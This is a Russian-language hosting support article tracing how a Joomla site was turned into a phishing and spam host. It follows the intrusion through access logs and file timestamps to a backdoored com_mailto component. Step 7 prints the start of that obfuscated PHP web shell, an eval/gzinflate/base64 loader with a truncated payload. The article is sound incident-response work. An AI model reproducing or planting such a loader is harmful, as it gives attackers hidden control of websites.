Поиск источника вредоносного кода Joomla фишинг
Автор:

 

На хостинге все файлы сайта удалены и вместо них огромное количество .html файлов с фишингом и рекламой.

Выглядит это примерно так:

 

[root@server domain.com]# ls -la

итого 108432

-rw-r--r-- 1 user user 31704 Окт 10 07:46 00_Chanel-Diamond-Ring_yv2_Bb.html

-rw-r--r-- 1 user user 54013 Окт 7 04:20 00-mYKZ-Chloe-Fragrance-Body-Cream.html

-rw-r--r-- 1 user user 31261 Окт 7 12:44 00n_Efiru-Series_79.html

-rw-r--r-- 1 user user 37191 Окт 7 05:25 00-rWQL-Calvin-Klein-Beauty.html

-rw-r--r-- 1 user user 33568 Окт 7 18:23 00_Women-Suit-Coat_87SO.html

-rw-r--r-- 1 user user 37984 Окт 8 21:53 01b_Cordless-Cleaner_07.html

-rw-r--r-- 1 user user 43828 Окт 7 07:03 02-CHANLUU-AGENCY-TF-oc.html

-rw-r--r-- 1 user user 36381 Окт 10 05:49 02_Chanluu-Handling-Store_ic6_Wy.html

-rw-r--r-- 1 user user 36470 Окт 8 23:29 02e_16Inches-Bicycle_36.html

-rw-r--r-- 1 user user 37597 Окт 10 05:49 02_Velvetlounge-Bracelet_js7_Nl.html

-rw-r--r-- 1 user user 30840 Окт 8 00:58 03_12Inch-Tires_20OT.html

-rw-r--r-- 1 user user 25910 Окт 11 06:20 03-GOROS-PURCHASE-DL-gr.html

-rw-r--r-- 1 user user 29827 Окт 10 06:42 03-GOROZU-EAGLE-FACE-CM-av.html

-rw-r--r-- 1 user user 15740 Окт 7 08:43 03_Marc-Jacobs-Ring_gd2_Ri.html

-rw-r--r-- 1 user user 27345 Окт 9 22:45 03-uXXV-Chanel-Cosmetics-Face.html

-rw-r--r-- 1 user user 30085 Окт 9 02:00 05_Corner-Board_43JI.html

-rw-r--r-- 1 user user 41423 Окт 8 19:42 05d_Mini-Speaker_69.html

-rw-r--r-- 1 user user 35654 Окт 9 21:01 06-tAON-Chloe-Accessories.html

-rw-r--r-- 1 user user 35574 Окт 9 15:17 06-tKLT-Chloe-Official-Site.html

 

 

Действия по выявлению проблемы:

 

1) Поиск вредоносного кода используя критерий "eval"

 

Найдены файлы:

./rtt.by/media/media/css/cacheplugin.php:

./domain.com/qen/include.php

./domain.com/wp-content/include.php

 

Все эти файлы созданы в одно время 2015-10-06 09:32 :

[root@server www]# stat ./domain.com/wp-content/include.php

File: «./domain.com/wp-content/include.php»

Size: 28 Blocks: 8 IO Block: 4096 обычный файл

Device: fd02h/64770d Inode: 6165109 Links: 1

Access: (0644/-rw-r--r--) Uid: ( 2391/user) Gid: ( 2390/user)

Access: 2015-10-06 09:32:08.701000100 +0300

Modify: 2015-10-06 09:32:08.701000100 +0300

Change: 2015-10-06 09:32:08.701000100 +0300

 

[root@server www]# stat ./domain.com/qen/include.php

File: «./domain.com/qen/include.php»

Size: 28 Blocks: 8 IO Block: 4096 обычный файл

Device: fd02h/64770d Inode: 6166541 Links: 1

Access: (0644/-rw-r--r--) Uid: ( 2391/user) Gid: ( 2390/user)

Access: 2015-10-06 09:32:20.248000100 +0300

Modify: 2015-10-06 09:32:20.248000100 +0300

Change: 2015-10-06 09:32:20.248000100 +0300

 

2) Поиск событий в логах c сайтом которые произошли в ~2015-10-06 09:32

zcat ./logs/domain.com.access.log.5.gz | grep 09:32:* --color

27.159.210.196 - - [06/Oct/2015:09:32:08 +0300] "POST /templates/system/conns.php HTTP/1.0" 200 14 "http://domain.com/templates/system/conns.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537 (KHTML, like Gecko)" 1274

27.159.210.196 - - [06/Oct/2015:09:32:09 +0300] "POST /templates/system/conns.php HTTP/1.0" 200 14 "http://domain.com/templates/system/conns.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537 (KHTML, like Gecko)" 2154

27.159.210.196 - - [06/Oct/2015:09:32:11 +0300] "POST /templates/system/conns.php HTTP/1.0" 200 14 "http://domain.com/templates/system/conns.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537

 

 

т.е. на сайте был вредоносный скрипт /templates/system/conns.php который и осуществил создание других вредоносных скриптов

 

3) Поиск в логах упоминаний о /templates/system/conns.php

[root@server user]# zcat ./logs/domain.com.access.log.* | grep POST | grep conns.php

120.40.144.219 - - [11/Oct/2015:00:06:20 +0300] "POST /conns.php HTTP/1.0" 200 14 "http://domain.com/conns.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537 (KHTML, like Gecko)" 23501

27.159.210.196 - - [06/Oct/2015:09:32:24 +0300] "POST /templates/system/conns.php HTTP/1.0" 200 14 "http://domain.com/templates/system/conns.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537 (KHTML, like Gecko)" 1697

 

И находим, что первый запрос был выполнен 06/Oct/2015:09:32:24

 

4) Проверяем события за 06/Oct/2015:09:3*

[root@server user]# zcat ./logs/domain.com.access.log.6.gz | grep 05/Oct/2015:16:05:43 -B10 --color

95.108.132.176 - - [05/Oct/2015:15:54:17 +0300] "GET /index.php/roster/roster-pagans/133-roster/images/news/elaf-2013-anons-inosmi.jpg HTTP/1.0" 200 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 45223

178.172.138.138 - - [05/Oct/2015:15:58:23 +0300] "GET /index.php/comand/raspisanie-tenirovok HTTP/1.0" 200 - "http://vk.com/away.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 39670

178.172.138.138 - - [05/Oct/2015:15:58:23 +0300] "GET /favicon.ico HTTP/1.0" 404 209 "http://domain.com/index.php/comand/raspisanie-tenirovok" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 458

178.172.138.138 - - [05/Oct/2015:15:58:45 +0300] "GET /index.php/comand/raspisanie-tenirovok HTTP/1.0" 200 - "http://vk.com/away.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 52146

178.172.138.138 - - [05/Oct/2015:15:58:47 +0300] "GET /index.php/comand/raspisanie-tenirovok HTTP/1.0" 200 - "http://vk.com/away.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 36488

178.172.138.138 - - [05/Oct/2015:15:58:47 +0300] "GET /index.php/comand/raspisanie-tenirovok HTTP/1.0" 200 - "http://vk.com/away.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 42670

178.172.138.138 - - [05/Oct/2015:15:58:48 +0300] "GET /index.php/comand/raspisanie-tenirovok HTTP/1.0" 200 - "http://vk.com/away.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 31282

178.172.138.138 - - [05/Oct/2015:15:58:48 +0300] "GET /index.php/comand/raspisanie-tenirovok HTTP/1.0" 200 - "http://vk.com/away.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 34107

130.193.48.26 - - [05/Oct/2015:16:00:01 +0300] "GET /index.php/comand/inf-comand/87-games/images/news/Litwins-vs-Vityaz-small-2.jpg HTTP/1.0" 200 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" 47275

188.165.15.84 - - [05/Oct/2015:16:04:41 +0300] "GET /index.php/106-video-all/video-games/105-2011-03-19-litwins-vs-hogs-2?tmpl=component&print=1&page= HTTP/1.0" 200 - "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)" 37001

37.9.62.39 - - [05/Oct/2015:16:05:43 +0300] "POST /testosteron.php HTTP/1.0" 200 25752 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 75157

 

 

И находим подозрительный файл который не свойственен для CMS Joomla testosteron.php

37.9.62.39 - - [05/Oct/2015:16:05:43 +0300] "POST /testosteron.php HTTP/1.0" 200 25752 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 75157

 

Проверка показала, что данный файл отсутствует в резервной копии за 4 октября.

 

5) Начинаем искать источник testosteron.php .

[root@server user]# zcat ./logs/domain.com.access.log.* | grep testosteron

37.9.62.39 - - [28/Sep/2015:00:50:39 +0300] "POST /testosteron.php HTTP/1.0" 404 213 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 900

37.9.62.39 - - [28/Sep/2015:00:50:39 +0300] "POST /testosteron.php HTTP/1.0" 404 213 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 681

37.9.62.39 - - [28/Sep/2015:00:50:39 +0300] "POST /testosteron.php HTTP/1.0" 404 213 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 774

37.9.62.39 - - [28/Sep/2015:00:59:49 +0300] "POST /testosteron.php HTTP/1.0" 404 213 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 663

37.9.62.39 - - [28/Sep/2015:00:59:49 +0300] "POST /testosteron.php HTTP/1.0" 404 213 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 633

37.9.62.39 - - [28/Sep/2015:00:59:50 +0300] "POST /testosteron.php HTTP/1.0" 404 213 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 478

37.9.62.39 - - [06/Oct/2015:03:58:54 +0300] "POST /testosteron.php HTTP/1.0" 200 11099 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0" 4933036

37.9.62.39 - - [06/Oct/2015:04:56:31 +0300] "POST /testosteron.php HTTP/1.0" 200 10324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101 Firefox/25.0" 40190

37.9.62.39 - - [06/Oct/2015:04:56:31 +0300] "POST /testosteron.php HTTP/1.0" 200 11070 "-" "Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0" 13424

37.9.62.39 - - [06/Oct/2015:04:56:32 +0300] "POST /testosteron.php HTTP/1.0" 200 11062 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0" 32191

37.9.62.39 - - [06/Oct/2015:04:56:32 +0300] "POST /testosteron.php HTTP/1.0" 200 11062 "-" "Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20130405 Firefox/22.0" 16637

37.9.62.39 - - [06/Oct/2015:04:56:32 +0300] "POST /testosteron.php HTTP/1.0" 200 11082 "-" "Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20130406 Firefox/23.0" 15163

37.9.62.39 - - [06/Oct/2015:04:56:32 +0300] "POST /testosteron.php HTTP/1.0" 200 11086 "-" "Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0" 35764

37.9.62.39 - - [06/Oct/2015:04:56:33 +0300] "POST /testosteron.php HTTP/1.0" 200 11086 "-" "Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20130406 Firefox/23.0" 11411

37.9.62.39 - - [06/Oct/2015:04:56:33 +0300] "POST /testosteron.php HTTP/1.0" 200 11070 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0" 31095

37.9.62.39 - - [06/Oct/2015:04:56:33 +0300] "POST /testosteron.php HTTP/1.0" 200 11070 "-" "Mozilla/5.0 (Windows NT 6.0; rv:23.0) Gecko/20130406 Firefox/23.0" 24304

37.9.62.39 - - [06/Oct/2015:04:56:33 +0300] "POST /testosteron.php HTTP/1.0" 200 11090 "-" "Mozilla/5.0 (Windows NT 6.0; rv:25.0) Gecko/20100101 Firefox/25.0" 8364

37.9.62.39 - - [06/Oct/2015:04:56:34 +0300] "POST /testosteron.php HTTP/1.0" 200 11064 "-" "Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20130406 Firefox/23.0" 599344

37.9.62.39 - - [06/Oct/2015:04:56:34 +0300] "POST /testosteron.php HTTP/1.0" 200 11074 "-" "Mozilla/5.0 (Windows NT 6.0; rv:24.0) Gecko/20100101 Firefox/24.0" 11788

37.9.62.39 - - [06/Oct/2015:04:56:34 +0300] "POST /testosteron.php HTTP/1.0" 200 11086 "-" "Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0" 26794

37.9.62.39 - - [06/Oct/2015:04:56:35 +0300] "POST /testosteron.php HTTP/1.0" 200 11088 "-" "Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0" 28753

37.9.62.39 - - [06/Oct/2015:04:56:35 +0300] "POST /testosteron.php HTTP/1.0" 200 11074 "-" "Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0" 13788

37.9.62.39 - - [06/Oct/2015:04:56:35 +0300] "POST /testosteron.php HTTP/1.0" 200 11082 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0" 13528

37.9.62.39 - - [06/Oct/2015:04:56:35 +0300] "POST /testosteron.php HTTP/1.0" 200 11078 "-" "Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20130406 Firefox/23.0" 16070

62.109.10.237 - - [05/Oct/2015:15:21:21 +0300] "POST /testosteron.php HTTP/1.0" 200 79839 "-" "Mozilla/5.0 (Windows NT 6.0; rv:21.0) Gecko/20130331 Firefox/21.0" 23742

62.109.10.237 - - [05/Oct/2015:15:21:22 +0300] "POST /testosteron.php HTTP/1.0" 200 10327 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64; rv:22.0) Gecko/20130405 Firefox/22.0" 10666

37.9.62.39 - - [05/Oct/2015:16:05:43 +0300] "POST /testosteron.php HTTP/1.0" 200 25752 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 75157

37.9.62.39 - - [05/Oct/2015:16:05:45 +0300] "POST /testosteron.php HTTP/1.0" 200 19400 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 20927

37.9.62.39 - - [05/Oct/2015:16:05:46 +0300] "POST /testosteron.php HTTP/1.0" 200 7732 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 6833

37.9.62.39 - - [05/Oct/2015:16:05:46 +0300] "POST /testosteron.php HTTP/1.0" 200 10604 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 402725

37.9.62.39 - - [05/Oct/2015:16:05:47 +0300] "POST /testosteron.php HTTP/1.0" 200 25752 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 16849

37.9.62.39 - - [05/Oct/2015:16:05:47 +0300] "POST /testosteron.php HTTP/1.0" 200 25752 "http://domain.com/testosteron.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17" 16679

37.9.62.39 - - [05/Oct/2015:16:12:16 +0300] "POST /testosteron.php HTTP/1.0" 200 79841 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0" 123171

37.9.62.39 - - [05/Oct/2015:16:12:18 +0300] "POST /testosteron.php HTTP/1.0" 200 10324 "-" "Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20130406 Firefox/23.0" 46334

 

Видим что к указанному файлу пытались обращаться еще 28/Sep/2015:00:50:39 однако файл этот отсутствовал и веб-сервер отдавал код 404

Первый успешное обращение, получение кода 200 от вебсервера:

62.109.10.237 - - [05/Oct/2015:15:21:21 +0300] "POST /testosteron.php HTTP/1.0" 200 79839 "-" "Mozilla/5.0 (Windows NT 6.0; rv:21.0) Gecko/20130331 Firefox/21.0" 23742

 

т.е. 05/Oct/2015:15:21:21 с ip 62.109.10.237

 

6) Проверяем все обращения с IP 62.109.10.237

[root@server user]# zcat ./logs/domain.com.access.log.* | grep 62.109.10.237

62.109.10.237 - - [04/Oct/2015:14:40:32 +0300] "POST /components/com_mailto/views/mailto/plugin.php HTTP/1.0" 200 9189 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0" 60349

62.109.10.237 - - [02/Oct/2015:11:07:10 +0300] "POST /components/com_mailto/views/mailto/plugin.php HTTP/1.0" 200 80711 "-" "Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101 Firefox/25.0" 35808

62.109.10.237 - - [02/Oct/2015:11:07:11 +0300] "POST /components/com_mailto/views/mailto/plugin.php HTTP/1.0" 200 10930 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64; rv:22.0) Gecko/20130405 Firefox/22.0" 8941

62.109.10.237 - - [02/Oct/2015:13:59:55 +0300] "POST /components/com_mailto/views/mailto/plugin.php HTTP/1.0" 200 9148 "-" "Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0" 91322

 

И видим, что с этого IP обращались к модулю com_mailto CMS Joomla

 

7) Проверяем на подозрительные файлы модуль com_mailto который присутствует в резервной копии сайта за 4 октября


tail ./www/domain.com/components/com_mailto/views/mailto/plugin.php

 

<?php $YLbgPfj524 = "vh46afl7tm2ik*n3pws.bu;0j)(qo_erzxy51dg9c8/";$oDJXw7301 = $YLbgPfj524[16].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[38].$YLbgPfj524[29].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[16].$YLbgPfj524[6].$YLbgPfj524[4].$YLbgPfj524[40].$YLbgPfj524[30];$Gcwa9593 = "".chr(101)."\x76".chr(97)."".chr(108)."".chr(40)."g\x7Ai\x6E".chr(102)."".chr(108)."a".chr(116)."".chr(101)."".chr(40)."ba".chr(115)."e".chr(54)."\x34_".chr(100)."".chr(101)."".chr(99)."o\x64e".chr(40)."";$O9654 = "".chr(41)."\x29)".chr(59)."";$jlvpdR6408 = $Gcwa9593."'TZxXr+vcel7v/SuMLwZOEjphbzCSQOydFDuJAxywir33Xx/u2EB8IWgvkVwi53zn846xqK1/+pdk36p/TMm6/vP/+ue/Sqwk8rzMSxRGsDItkAwqiZRGYAqHS4pM//q3f/qXbOzG5c/O/yUv8T8v5EWZ7N32jyTb6nF4t/xNqLti1ZPhb/9p674W/0ia5Hq3b8te/KctWZUsa7H9OTCoh3w81/8BIzj8Hjwtxe8fSzF1SVb817/A//nfweKvf/3r7xeB//0iifcZfh/s3y+Eep/J97XP+0y/D/59EP++7c8+JPbvx/y//ZD/eA3999fQdz/03Y4L78//sR/xZ9t/+hmh/oanMF1eMwo1HJWD54Sz6PYd9Qtjv8MVRVhWPHyRCu5x2xO2XdDvGyBhVxM7XmNzCpKWaxBB0JU6j5PLvgFlC5pJpqgjLcjiCIsjLckinoZo1q5HTYT7XJIKAKLuQ6YaBZroEFpYcpC0HgJQPNCTr1QoHUUgOxjyk1PmoA5Z5ibPp+NwclqPb822BZ34QZIDh3FWDVgMFUaziEbhbpcrwG0dzopeOlgO5vABoxl0p0t5sJK/m7iix7QLitrcK30gR1Cj59RI1jt9rOuHKel2AMgcDp5A7ZfBXUY4MgPYCPCAyXH326YVNpf1W0KMeU51XnH6dBopJDMgqtLFo9E73JMBPCT0nBcGqlXrjvBRJUCgaAz+COpoSjBy+yumMJstUlzyW2mxkDx2n8zAhoR/yIjQtbP+ZCUDdhJDqUK9nWnFZAIswVAvLpH0uCJ3K1PEP2g5ugn/WNNZ5ISkTFgp2fSHyxcL4c2u/J1YNmW7FR/QTWcmjYVPYl9y1MlkDSmbcFSmgSZVNrZ820t7JV

 

т.е. файл ./www/domain.com/components/com_mailto/views/mailto/plugin.php содержит источник заражения сайта.

 

8) Ищем откуда указанный файл взялся.

[root@server user]# ls -la

 

-rw-r--r-- 3 user user 25655 Авг 27 15:06 /www/domain.com/components/com_mailto/views/mailto/plugin.php

 

Файл на хостинге появился 27 августа.

 

Проверяем когда был установлен компонент com_mailto

[root@server user]# ls -la ./www/domain.com/components/com_mailto/views/итого 20

drwxr-xr-x 4 user user 4096 Авг 27 15:06 .

drwxr-xr-x 4 user user 4096 Авг 27 15:06 ..

-rw-r--r-- 3 user user 31 Фев 2 2012 index.html

drwxr-xr-x 3 user user 4096 Авг 27 15:06 mailto

drwxr-xr-x 3 user user 4096 Авг 27 15:06 sent

 

Компонент mailto был установлен в CMS Joomla 27 августа и совпадает по дате с вредоносным файлом.

 

Подведя итог, можно сказать, что заражение сайтов произошло от установленного модуля com_mailto который при установке уже содержал вредоносный файл plugin.php



Если решение вопроса найти не удалось, Вы можете отправить нам заявку:



(2 голос(а))
Эта статья помогла
Эта статья не помогла

Комментарии (0)
ActiveCloud Служба поддержки клиентов
Здравствуйте! Если вам нужен хостинг или домен — вы можете купить его у нас.
Выбрать тариф